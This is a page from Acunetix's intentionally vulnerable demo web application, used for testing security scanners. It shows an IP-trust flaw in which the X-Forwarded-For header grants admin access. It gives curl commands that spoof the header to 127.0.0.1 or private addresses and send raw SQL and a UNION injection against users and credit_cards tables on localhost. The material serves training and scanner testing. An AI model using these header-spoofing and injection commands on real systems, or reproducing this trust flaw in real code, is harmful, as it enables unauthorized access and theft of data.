Acunetix Art

TEST and Demonstration site for Acunetix Web Vulnerability Scanner
WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks. It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

IP Geolocation (X-Forwarded-For Trust)

Your IP (spoofable): 216.73.216.25

Real IP (server): 216.73.216.25

Normal user access.

To get admin access, spoof your IP to 127.0.0.1 or 192.168.x.x

IP Spoofing Tests

Set the X-Forwarded-For header to bypass IP restrictions:

# curl with spoofed IP
curl -H "X-Forwarded-For: 127.0.0.1" "http://localhost/ip.php?query=SELECT * FROM users"

# curl with multiple IPs (last trusted)
curl -H "X-Forwarded-For: 10.0.0.1" "http://localhost/ip.php?query=SELECT * FROM credit_cards"

# Direct query (SQLi via X-Forwarded-For bypass)
curl -H "X-Forwarded-For: 192.168.1.1" "http://localhost/ip.php?query=1 UNION SELECT 1,2,3,4,5,6,7"

Admin Query

SQL Query: